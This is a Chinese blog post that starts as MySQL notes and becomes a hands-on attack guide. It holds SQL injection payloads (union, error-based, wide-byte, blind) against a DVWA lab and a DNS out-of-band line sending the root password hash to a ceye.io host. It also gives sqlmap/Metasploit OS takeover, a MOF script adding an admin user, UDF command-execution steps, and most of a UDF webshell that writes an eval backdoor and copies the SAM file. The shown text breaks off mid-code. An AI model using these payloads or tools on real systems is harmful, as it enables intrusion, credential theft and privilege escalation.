屠龙之技 --sql注入 不值得浪费超过十天 实战中sqlmap--lv 3通杀全国
MySQL小结
发表于 2020-09-21 分类于 知识整理 阅读次数:
本文字数: 67k 阅读时长 ≈ 1:01Web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句。
MySQL安装及配置
Mysql安装(这里版本为8.0.17)
第一步:下载Mysql地址:
https://dev.mysql.com/downloads/mysql/第二步:配置Mysql环境变量将下载的mysql文件夹bin目录加入环境变量,D:\mysql\bin
第三步:安装mysql首先执行mysqld --initialize-insecure(自动生成无密码Root用户),然后以管理员的权限执行CMD:mysqld install,即可完成安装。
第四步:启动/停止mysqlnet start mysql
net stop mysql
登陆MySQL及配置密码
登陆MySQL(这里创建的是无密码root)mysql -u root -p,提示输入密码时候无需输入,回车即可。
更改Mysql密码ALTER USER root@localhost IDENTIFIED WITH mysql_native_password BY RootPwd@123456;
flush privileges;
开启mysql远程查看是否支持远程: select host ,user from user;
第一种:update user set host =% where user=root;
第二种:grant all privileges on *.* to root@% identified by 123456 with grant option;
MySQL命令学习
有关查看数据库相关信息的命令:select @@version查看当前MySQL版本
select user(); / select system_user();/select session_user();查看当前用户
select database();查看当前数据库
select connection_id();返回当前客户的连接ID
select now()查看系统当前时间
select @@basedir;查看Mysql的安装路径
select @@datadir;查看数据库安装路径
show databases;查看当前MySQL所有库名
mysqldump -u root -p --default-character-set=UTF8 [database] [table] > dump.txtMysql导出位.txt
mysql -u root -p --default-character-set=UTF8 database_name < dump.txt导入
一些命令use <database_name>使用某个数据库,需指定库名
show tables;查看当前数据库的数据库表
select * from users; 查询users表中所有的数据
select first_name from users;查询users表中first_name字段的所有内容
select concat(user,0x3C,password) from users; concat连接字符串函数
select group_concat(user,0x3C,password) from users;将user,password字段所有内容连接成一个字符串
实践:
select * from users limit m,n;查询user表中数据,输出第m(代表下标,下标都是从0开始)条开始的n条数据
select concat(user,0x3c,password) from users limit 3,2;将users表中user、password字段第四、五条数据用<号连接,输出
一些高级命令select mid(user(),2,3);mid字符串截取,截取当前用户名第二个字符开始的三个字符
select substr(user(),2,3);subsets字符串截取,截取当前用户名第二个字符开始的三个字符
select ord(mid(database(),3,1));/select ord(substr(database(),3,1));查询当前库名的第三个字符的ASCII
select ascii(s);查询s的ASCII值,同ord
select char(97);将ASCII值转为字符串
select count(*) from users;查询users表中数据条数
select length(user());查询当前用户名长度
select sleep(2);延时两秒返回数据
select * from users order by user;根据字段名排序(拓展:order by 8执行正常,order by 9报错,证明字段个数只有八个)
select password from users where user_id=2 or user_id=3;查询users表中user_id为2和3的password字段的值
增删改查
增加一条数据需要匹配users表中字段个数,如果字段不匹配会报错;如果字段内容限定为not NUll,字段为空时也报错。
insert into users values(9,test,test,test123,ssss,lujing,2019,2020);
修改数据update users set user=ccc where password=ssss;将password为ssss的那条数据的user字段内容更新为ccc;多条数据用逗号隔开 set user=ccc,user_id=20
删除数据delete from users where user_id=9;删除users表中user_id为9的那条数据
drop table users;删除users表
drop database dvwa;删除dvwa库
Mysql数据去重
(找了半天,只能将查询结果导入到另外一张表中了。。。)
利用distinct进结果去重,然后将查询的结果导入到另外一张表中。insert ignore into user_info select distinct name,sex,id_card,tel,address,mail from users_room;
SQL注入可能用到的语法
基础:
基于and/or判断注入点首先判断页面正常返回。
然后select user,password from users where user_id=2 and 1=1;正确执行(and两边表达式均成立,返回为真)页面正常返回
select user,password from users where user_id=2 and 1=2;返回为空(and两边表达式一真一假,返回为假)页面返回错误或者不正常
即可证明SQL存在
OR同理—>
select user,password from users where user_id=2 or 1=1;返回所有user和password的内容(or两边表达式都为真且1=1恒成立,则返回所有)
select user,password from users where user_id=2 or 1=2;仅返回一条数据(1=2不成立,因此只返回user_id=2的那条数据指定的内容)
注意:and 1=1 并非绝对,只要是表达式,类似于’s’=’s’等等,,,,
判断SQL注入存在,需要三个页面对比才行。
注入点的多种情况select user, password from users where user_id=2;如果源于句,使用了引号将ID值扩起来,需要构造如下:where user_id=2 and 1=1,也即是2 and 1=1,2 and 1=2
同理,如果使用双引号,括号扩起来的,也需要按照上面的情况。(如果where user_id=(1)这样呢?)
试一试:2,2?
SQL注入的原理就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
高级查询语法
查询结果排序select * from users order by last_name;查询users表中的所有数据,并使用last_name字段内容排序(根据的是ASXCII码)
可以利用select * from users order by N;判断users表字段个数,N小于等于字段数正常返回数据,大于则报错。
-- -,#在数据库中表示注释之后的内容,/**/表示多行注释,注释掉扩起来的内容
select * from users order by last_name#asdasdas;
select * from users order by last_name-- -asadasdas;
多行注释也可以用于行内:select * from users/**/order/*ssssss*/by last_name;
其他几个排序:
降序排列查询结果:select * from users DESC;
升序(默认排序):select * from users ASC;
组合查询一个查询中从不同的表返回结果数据
在一个表中执行多个查询,按一个查询返回数据
select user, password from users where user_id=2 union select last_name, first_name from users where user_id=4
查询user_id=2的use,password字段内容,查询user_id=4的last_name,first_name字段的值,一起返回(也即是同时返回。。。)
模糊查询关键词like,通配符%,*,.等,常用的正则规则字符。
select * from users where avatar like %hac%匹配users表中avatar字段中含有hac的内容
“*“表示匹配零个或多个在它前面的东西。例如,”D*“匹配任何数量的”D”字符
“.“ 匹配任何单个的字符。
当使用正则匹配时,使用REGEXP和NOT REGEXP操作符(或RLIKE和NOT RLIKE,功能是一样的)
模糊查询中的注入:select * from users where avatar like %hac% union select password from users;首先查询avatar字段中包含hac的数据,然后查询users表中的password字段内容,然后组合起来返回(会去重)
一些事项:select user_id from users union select password from users;正常执行(组合查询时候,前后查询的字段数要一样,这样就是错误的:select user_id from users union select password,user from users;)
SQL注入示例
题目:where user_id=2处存在注入点,要求判断注入点并查询到user,password字段内容。
源于句:select user_id from users where user_id=2;
解:
select user_id from users where user_id=2 and 1=1-- -;正常select user_id from users where user_id=2 and 1=2-- -;不正常,结合起来判断存在注入点select user_id from users where user_id=2 order by 1-- -;正常select user_id from users where user_id=2 order by 2-- -错误,证明只有一个字段(在使用的user_id)select user_id from users where user_id=2 union select 1-- - 1为占位符,填充使用select user_id from users where user_id=2 union select database()-- -替换占位符,可以查询一些常用信息(版本,数据库名,用户名,路径等)select user_id from users where user_id=2 union select concat(user,0x3c,password) from users-- -(使用concat连接user,password一起输出,就不用连续使用union select)Mysql系统表利用
infomation_schema说明
MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。
information_schema数据库表说明:
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。COLLATIONS表:提供了关于各字符集的对照信息。COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。KEY_COLUMN_USAGE表:描述了具有约束的键列。ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表https://blog.csdn.net/demonson/article/details/80388677(MySQL information_schema 详解)
information_schema使用示例
获取表名1select 1,table_name from information_schema.tables where table_schema=(数据库名十六进制) limit 2,1-- - # 当前数据库所有表,使用limit n,1 逐条输出。
1(select count(table_name) from information_schema.tables where table_schema =database())=2-- - # 判断表的数量为2
1select 1,column_name from information_schema.columns where table_name=0x7573657273 limit 1,1-- -
1length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1)=10-- -
1length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1))=10-- -
MySQL注入基础
常用系统函数
1234567891011示例:select database();查询当前数据库名称➢ 1.system_user() 系统用户名➢ 2.user() 用户名➢ 3.current_user() 当前用户名➢ 4.session_user() 链接数据库的用户名➢ 5.database() 数据库库名➢ 6.version() mysql 数据库版本信息➢ 7.load_file() 转换成16 或10 进制 读取本地文件➢ 8.@@datadir 读取数据库路径➢ 9.@@basedir MYSQL 安装路径➢ 10.@@version_compile_os
常用关键字/函数
123456789limit m,n # 从m开始检索n条数据select mid(database(),2,1) # 用于得到当前数据库名的第二个字符select ord(mid(user(),1,1))= 114 # ord函数返回字符串第一个字符的 ASCII 值。select concat(1,0x3c,2) # 将字符串1和2用<连接起来 输出为:1<2select sleep(2) # 结果在两秒钟后返回,可理解为暂停2秒select length(user()) # 当前用户名长度 length() 长度函数select substr(user(),2,1) # 从第二个字符开始截取一个字符长度,这里为oIF(expr1,expr2,expr3) # expr1 是TRUE则IF()的返回值为expr2; 否则返回值则为 expr3select count(user) from users # 查询users表中user字段所有数据的 个数
系统表简介
Information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。
该库有多个表其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。
更多介绍:
https://blog.csdn.net/Touatou/article/details/80775601显性注入
经过在线DVWA http://43.247.91.228:81测试(介绍基础,所以选择Low级别),在线的级别调不好,请本地搭建。
源码:
12345678910111213141516171819202122232425262728<?phpif(isset($_GET[Submit])){// Retrieve data $id = $_GET[id];$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";$result = mysql_query($getid) or die(<pre> . mysql_error() . </pre> );$num = mysql_numrows($result);$i = 0;while ($i < $num) {$first = mysql_result($result,$i,"first_name");$last = mysql_result($result,$i,"last_name");echo <pre>;echo ID: . $id . <br>First name: . $first . <br>Surname: . $last;echo </pre>;$i++;}}?>
重点看源码中:SELECT first_name, last_name FROM users WHERE user_id = $id
漏洞产生原因:SQL语句未经过处理,直接将传入的$id当做参数执行。(这里不进行 or 1=1之类的测试)
构造语句进行解释:user_id=$id,如果传入的$id值为1 order by 5-- -,源语句变成了:
user_id=1’ order by 5-- -,在数据库中是可以正常执行的。
当num为2时, 也就是user_id=1’ order by 2-- -正常执行,为3时报错,说明当前库的users表有两个字段。
开始注入
这里数据库版本大于5.0,测试的是字符型,因此是 ‘ and ‘1’=’1’,省略 1’
这里并非直接获取密码啊,什么的,仅仅展示可能用到了的语句。
开始注入之前,获取有用信息:12345678order by 2-- - # 获取当前数据库,所使用表的字段长度,-- - 表示注释之后的内容and 1=1 union select 1,2-- - # 匹配字段and 1=2 union select 1,2-- - # 爆字段位置,也即是可用字段,这里都可以# 这时候就可以使用mysql系统函数来测试。and 1=1 union select 1,ord(mid(user(),1,1))=114-- -# 正常返回证明当前数据库用户为r开头一般为root.and 1=1 union select 1,ord(mid(user(),2,1))=111-- -# 正常返回证明当前数据库用户第二个字符为o...
12345获取表名源语句:and 1=1 union select 1,table_name from information_schema.tables where table_schema=(数据库名十六进制) limit 2,1-- - # 当前数据库所有表,使用limit n,1 逐条输出。注入语句:and 1=1 union select 1,table_name from information_schema.tables where table_schema=0x64767761 limit 2,1-- -
12原理同获取表名。and 1=1 union select 1,column_name from information_schema.columns where table_name=0x7573657273 limit 1,1-- -
12345678910# 已经爆出表名和字段名,直接查询即可and 1=1 union select user,password from users-- -# 上语句有两个可用注入字段,如果只有一个呢?# 第一种方式,挨个爆,先爆名字,再爆密码and 1=1 union select 1,user from users-- -# 第二种方式,使用concat函数将字符串连接起来and 1=1 union select 1,concat(user,0x3c,password) from users-- - # `0x3c`为`<`,这里将user、password用`<`连接起来。输出格式为:pablo<0d107d09f5bbe40cade3de5c71e9e9b7
至此,已经爆出数据库中可用的账号密码,非root。类似于XXX系统的用户/管理员账号密码。脱裤子的话请绕行- -
MySQL函数报错
Floor
当使用 floor,rand,group by 连用时候会报错。利用报错,使用concat连接,可以实现注入。
123456789101112select concat(floor(rand(0)*2), ====),count(1) from users group by user_id;输出:+----------------------------------+----------+| concat(floor(rand(0)*2), ====) | count(1) |+----------------------------------+----------+| 0==== | 1 || 1==== | 1 || 1==== | 1 || 0==== | 1 || 1==== | 1 |
12345678910111213select concat(floor(rand(0)*2), ====,(select user())),count(1) from users group by user_id;输出:+--------------------------------------------------+----------+| concat(floor(rand(0)*2), ====,(select user())) | count(1) |+--------------------------------------------------+----------+| 0====root@localhost | 1 || 1====root@localhost | 1 || 1====root@localhost | 1 || 0====root@localhost | 1 || 1====root@localhost | 1 |+--------------------------------------------------+----------+
updatexml
12updatexml() //5.1.5and 1=(updatexml(1,concat(0x3a,(select user())),1))
12345select * from users where user_id=1 and 1=(updatexml(1,concat(0x3a,(select database())),1));报错:ERROR 1105 (HY000): XPATH syntax error: :dvwa
12345select * from users where user_id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1));报错:ERROR 1105 (HY000): XPATH syntax error: :root@localhost
extractvalue
123456extractvalue() //5.1.5and extractvalue(1,concat(0x5c,(select user())))select * from users where user_id=1 and extractvalue(1,concat(0x3a,(select database())));ERROR 1105 (HY000): XPATH syntax error: :dvwa
exp
123exp() //5.5.5版本之后可以使用select host from user where user = root and Exp(~(select * from (select version())a));
name_const
123name_const //支持老版本select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;
几何函数
123geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()select multipoint((select * from (select * from (select * from (select version())a)b)c));
宽字节
参考:
https://xz.aliyun.com/t/3992#toc-3MYSQL client链接编码的锅
1show variables like %character%
由于编码不一致,导致的问题,主要是汉字占用了3个字节。关键字%df
,当客户端连接编码设置为GBK的时候 与php进行交互的时候就会出现字符转换 导致单引号逃逸的问题。
测试payload: index.php?id=%df%27MYSQL iconv函数 mb_convert_encoding函数的锅借用先知: $id =iconv(GBK,UTF-8, $id)%df%27===(addslashes)===>%df%5c%27===(iconv)===>%e5%5c%5c%27其实就是 utf8 -> gbk ->utf-8 低位的%5c 也就是反斜杠干掉了转义单引号的反斜杠。
Big5编码导致的宽字节注入
猜测代码: iconv(utf-8,BIG5,$_GET[id])
payload构造同上: 功’ -> addsalshes -> 功 -> iconv -> %A5%5C%5C%27->¥ 逃逸单引号
%E8%B1%B9SQL盲注
这里包含了Bool和Time类型
开始注入
本地搭建的DVWA,在线的显性注入出了点问题,就本地搭建了。
这里测试使用了=号,为了直观,真实环境协同使用<、>快速判断
仔细观察通过长度和返回时间两种方式,下文对时间的不过多说了
判断数据库名长度12345# 第一种,通过长度and length(database())=4-- - # 正常返回 说明当前用户名长度为 14 ,我这里是:root@localhost# 第二种通过返回时间判断,如果网络较差,建议多设置几秒。and if(length(database())=4,sleep(5),1)-- - # 如果数据库名长度为4则延时5秒返回结果
123456# 只能挨个字符判断,这里值猜不到数据库名的情况下,挨个字符判断# 第一种,通过ASCII值判断,判断正确返回正常页面,and ascii(substr(database(),1,1))=100-- - # 第1个字符开始,1为截取字符长度# 第二种,通过返回时间and if(ascii(substr(database(),1,1))=100,sleep(3),1)-- -
1234567891011121314151617# 猜表的数量,因为不知道数据库结构,只能慢慢猜,这个根据自己需求,非必须and (select count(table_name) from information_schema.tables where table_schema =database())=2-- - # 判断表的数量为2# 基于返回时间and if((select count(table_name) from information_schema.tables where table_schema =database())=2, sleep(3),1)-- -# 猜表名的长度,这里注意是length((exp1))=9,用括号将查询内容括起来and length((select table_name from information_schema.tables where table_schema =database() limit 0,1))=9-- -# 通过limit 1,1遍历表名长度, limit n,1 n从0开始,0表示第一个表# 基于时间的不在写了。# 猜第一个表的第一个字母,这里substr((exp1),1,1)=103,用括号将查询内容括起来and ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 0,1),1,1))=103-- -# 上语句简析:ascii( substr(exp1,1,1) )=103# exp1 = select table_name from information_schema.tables where table_schema =database() limit 0,1# 基于时间的不再写了。
通过limit控制查询的表,通过substr截取表名字符串,挨个判断值
判断字段名原理和判断表名一样
12345678910111213141516# 首先来个嵌套的,这里不用获取表名,可以直接得到字段长度、值。# 这里获取的是第一个表的第一个字段的长度# 通过第二个limit来控制查询字段。and length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1))=10-- -# 第二种,根据前面的表名,使用如下语句,十六进制数据为:表名的十六进制。and length((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1))=10-- -# 基于时间的就不再写了。也就是 if(length()=2,sleep(2),1)这种# 求值第一个表的第一个字段的第一个字母and ascii(substr((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1),1,1))=99-- -# 嵌套求第一个表的第一个字段的第一个字母and ascii(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1),1,1))=99-- -
1234567# 其实有了表名和字段名,可以直接查询的。先获取长度再获取值。and length((select comment_id from guestbook))=1-- -# 获取值and ascii(substr((select comment_id from guestbook),1,1))=49-- -# 基于时间的and if(ascii(substr((select comment_id from guestbook),1,1))=49,sleep(3),1)-- -
到此,盲注的基本方法已经完成
DNSLOG
有时候注入发现并没有回显,也不能利用时间盲注,那么就可以利用带外通道,也就是利用其他协议或者渠道,如http请求、DNS解析、SMB服务等将数据带出。
1234SELECT LOAD_FILE(CONCAT(\\\\,( SELECT DATABASE() ),.xx.xx\\x));# ceyeSELECT LOAD_FILE(CONCAT(\\\\,(SELECT password FROM mysql.user WHERE user=root LIMIT 1),.xxx.ceye.io\\abc));
条件:
mysql.ini 中 secure_file_priv 必须为空mysql 新版本下secure-file-priv字段 : secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
12345当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
MySQL提权
SQLMap+MSF
已知用户名密码情况下,利用Sqlmap结合MSF进行提权。(需要对目录有写权限)
1sqlmap -d mysql://admin:123456@10.52.95.209:3306/mysql --os-pwn --msf-path /opt/metasploit-framework/
MOF提权
简介:
mof是windows系统的一个文件(在
c:/windows/system32/wbem/mof/nullevt.mof)叫做”托管对象格式”其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。必备命令
所需要的SQL语句
select load_file(D:\wamp\xishaonian.mof) into dumpfile
c:/windows/system32/wbem/mof/nullevt.mof;必备脚本
12345678910111213141516171819202122232425# pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter{EventNamespace = "Root\\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";};instance of __FilterToConsumerBinding{Consumer = $Consumer;Filter = $EventFilter;};
UDF提权
这里的前提是已经上传了udf.dll,如果没有写入权限,emmm,,,我不肥了。。
注意事项:
mysql<5.2版本的将.dll文件导入到c:\windows 或者c:\windows\system32 目录下。mysql>5.2版本的将.dll文件导入到/MySQL/lib/plugin/ mysql安装目录下。如果报错内容为:The MySQL server is running with the --secure-file-priv option so it cannot execute this statemen请在MySQL配置文件my.ini文件的[mysqld]选项内加入secure_file_priv =然后重启mysql服务。。如果报错--secure-file-priv 又无法修改my.ini,则没有办法。详情参考:--secure-file-priv 特性
手动UDF提权
制作udf.dll
SQLMAP下路径:
12345/usr/local/Cellar/sqlmap/1.4.3/libexec/data/udf/mysql/windows/64/usr/local/Cellar/sqlmap/1.4.3/libexec/extra/cloakpython2 cloak.py -d -i lib_mysqludf_sys.dll_# 即可在当前目录下生成 lib_mysqludf_sys.dll
利用 1
查看plugin目录show variables like %plugin%;提示:由于MySQL>5.2版本后,在其安装目录的lib目录下没有 plugin 目录,所以,我们得新建这个目录,并且将我们的 udf.dll 文件放入 plugin目录下,我们执行下面命令,使用NTFS ADS流创建 plugin
1select xxxxxx into dumpfile C:\\Program\ Files\\MySQL\\MySQL\ Server\ 5.4\\lib\\plugin::$INDEX_ALLOCATION
注意:如果创建函数时报错,请根据lib_mysqludf_sys.dll中的函数创建。
利用2
利用交互式的SHELL,mysql -uroot -pxxx无法继续交互,需要参数e解决这个问题。
123456mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values(hex(load_file(C:\\xxxx\\xxxx.dll)));"mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE c:\\windows\\system32\\xxxx.dll;"mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME udf.dll"mysql -uroot -pxxxxxxxx mysql -e "select shell(cmd,C:\\xxxx\\xxx\\xxxxx.exe);"
如没有指定database,将会出现错误,而使用UNION,将不会有回显,一定出现问
题,将会很难定位,故选择以mysql.x的方式指定。1234567mysql -uroot -pXXXXXX -e "create table mysql.a (cmd LONGBLOB);"mysql -uroot -pXXXXXX -e "insert into mysql.a (cmd) values(hex(load_file(D:\\XXXXXXXXXX\\mysql5\\lib\\plugin\\u.dll)));"mysql -uroot -pXXXXXX -e "SELECT unhex(cmd) FROM mysql.a INTO DUMPFILED:/XXXXXXXXXX/mysql5/lib/plugin/uu.dll;"mysql -uroot -pXXXXXX -e "CREATE FUNCTION shell RETURNS STRING SONAME uu.dll"mysql -uroot -pXXXXXX -e "select shell(cmd,whoami);"
UDF提权大马
可以使用T00ls udf.php
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298<?php//t00ls...................session_start();?><html><head><title>T00ls UDF.PHP</title><style type="text/css">input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}</style><script type="text/javascript">function outfile(){document.getElementById("sql2").value= unescape("select%20%27%3C%3Fphp%20eval%28%24_POST%5B%5C%27pass%5C%27%5D%29%3F%3E%27%20into%20outfile%20%27d%3A%5C%5Cninty.php%27");}function loadfile(){document.getElementById("sql2").value = unescape("select%20load_file%28%27c%3A%5C%5Cboot.ini%27%29");}</script></head><body><?phperror_reporting(0);if (isset($_REQUEST[action]))$action = $_REQUEST[action];else$action = vConn;switch ($action) {case vConn:vConn();break;case conn:conn();break;case exec:execsql();break;case install:install();break;case copy:cp();break;case cplug:cplug();break;case logout:logout();break;case func:func();break;}function vConn() {echo by ninty http://www.t00ls.net/<form action="" method="post"><table><input type="hidden" name="action" value="conn"><tr><td>ip:</td><td><input type="text" name="host" value="localhost"></td></tr><tr><td>uid:</td><td><input type="text" value="root" name="uid"></td></tr><tr><td>pwd:</td><td><input type="text" name="pwd"></td></tr><tr><td>db:</td><td><input type="text" name="db" value="mysql"></td></tr><tr><td><input type="submit"/></td><td> </td></tr></table></form>;}function func(){$conn = conn(false);mysql_select_db(mysql,$conn);mysql_query(CREATE TABLE `func` ( `name` char(64) collate utf8_bin NOT NULL default \\, `ret` tinyint(1) NOT NULL default \0\, `dl` char(128) collate utf8_bin NOT NULL default \\, `type` enum(\function\,\aggregate\) character set utf8 NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT=\User defined functions\);if (mysql_errno($conn) != 0) {echo mysql_error() . <br/>;}echo Create mysql.func success !;mysql_close($conn);}function conn($close = true) {if (isset($_SESSION[host])) {$host = $_SESSION[host];$uid = $_SESSION[uid];$pwd = $_SESSION[pwd];$db = $_SESSION[db];} else {$host = $_POST[host];$uid = $_POST[uid];$pwd = $_POST[pwd];$db = $_POST[db];}$conn = mysql_connect($host,$uid,$pwd);if (!$conn) {echo mysql_error().<br/>;vConn();exit();}mysql_select_db($db,$conn);if (mysql_errno($conn) != 0) {echo mysql_error().<br/>;vConn();exit();}$_SESSION[host] = $host;$_SESSION[uid] = $uid;$_SESSION[pwd] = $pwd;$_SESSION[db] = $db;//mysql_query(set names utf8);showM($conn,$close);return $conn;}function logout(){unset($_SESSION[host]);unset($_SESSION[uid]);unset($_SESSION[pwd]);unset($_SESSION[db]);unset($_SESSION[notsame]);unset($_SESSION[over51]);unset($_SESSION[plugindir]);$url = $_SERVER[PHP_SELF];$filename = end(explode(/,$url));echo <script>location.href = ".$filename.?rn="+Math.random()</script>;}function showM(&$conn,$close = true){echo <center><b>t00ls UDF.PHP</b></center>;echo <form action="" method="post"><input type="hidden" name="action" value="logout"><input type="submit" value="Logout"></form>;echo <div style="border:solid 1px #333;background-color:#999;padding:4px">;$sql = select concat(\<b>user()</b>:\,user()) as m union select concat(\<b>database():</b>\,database()) union select concat(\<b>datadir</b>:\,@@datadir) union select concat(\<b>basedir</b>:\,@@basedir) union select concat(\<b>version()</b>:\,version()) ;;$meta = mysql_query($sql,$conn);$tmp = 1;while ($row = mysql_fetch_array($meta,MYSQL_ASSOC)) {echo $row[m];if ($tmp == 1) {$tmp = 2;$h = substr($row[m],strpos($row[m],@)+1);if ($h != localhost) {echo <b><i><font color=green>[web and db is not the same server.]</font></i></b>;$_SESSION[notsame] = true;}}echo <br/>;}echo <b>plugin_dir</b>:;$meta = mysql_query(show variables like "plugin_dir");if (mysql_num_rows($meta)==0) {echo <font color=white>mysql is under 5.1 , ;if (!isset($_SESSION[notsame]))echo u can dump udf.dll to any directory in follow paths;echo </font>;} else {//over 5.1$_SESSION[over51] = true;$row = mysql_fetch_row($meta);$_SESSION[plugindir] = str_replace(\\,\\\\,str_replace(/,\\,$row[1])).\\\\udf.dll;echo <font color=white>.str_replace(/,\\,$row[1]).</font>;echo (mysql over 5.1, udf.dll can only dump to plugin_dir) ;if (isset($_SESSION[notsame]))echo <font><b><i>[maybe dump dll will be failed!]</i></b></font>;else {if (!file_exists(str_replace(/,\\,$row[1])))echo <a href="?action=cplug&dir=.base64_encode(str_replace(/,\\,$row[1])).">Create PluginDir</a>;elseecho exists!;}}echo <br/>;if (!isset($_SESSION[notsame]) && !isset($_SESSION[over51]))echo <b>path</b>:<font color=green><b>.getenv(path).</b></font><br/>;$meta = mysql_query(select 1,1,1,1 from mysql.user union select * from mysql.func);if (mysql_num_rows($meta)==0)echo <b>Mysql.Func</b> : <font color=white><b><i><font color=red>dont exist!</font></i></b></font> must <a href="?action=func">create</a> mysql.func first!;elseecho <b>Mysql.Func</b> : <font color=green>exist!</font>;echo <br/>;echo <b>grants</b> : <font color=white>;$meta = mysql_query(show grants;,$conn);while ($row = mysql_fetch_row($meta)) {echo $row[0];}echo </font>;echo </div>;if ($close)mysql_close($conn);echo <br/>;if (isset($_POST[path])) {$path = $_POST[path];if (get_magic_quotes_gpc())$path = stripslashes($path);}else$path = isset($_SESSION[plugindir]) ? $_SESSION[plugindir] : c:\\\\windows\\\\system32\\\\udf.dll;echo <div style="border:solid 1px #333;background-color:#999;padding:4px"><form action="" method="post"><input type="hidden" name="action" value="install"><input type="text" name="path" size="60" value=".$path."> <input type="submit" value="Dump UDF"></form>;echo <form action="" method="post"><input type="hidden" name="action" value="exec"><input type="hidden" name="dump" value="d"><input type="text" name="sql" size="60" value="CREATE FUNCTION shell RETURNS STRING SONAME \udf.dll\"> <input type="submit" value="Create Function"></form>;echo <form action="" method="post"><input type="hidden" name="action" value="copy"><input type="text" value="c:\\\\WINDOWS\\\\repair\\\\sam" name="source" size=30> <input type="text" name="target" size=30> <input type="submit" value="Copy"> <font color=white>please convert \\ to \\\\</font></form></div>;if (isset($_POST[sql]))$sql = $_POST[sql];else$sql = select * from mysql.user;if (get_magic_quotes_gpc())$sql = stripslashes($sql);if (isset($_POST[dump]))$sql = select shell(\cmd\,\whoami\);echo <form action="" method="post"><input type="hidden" name="action" value="exec"><textarea id="sql2" cols="100" 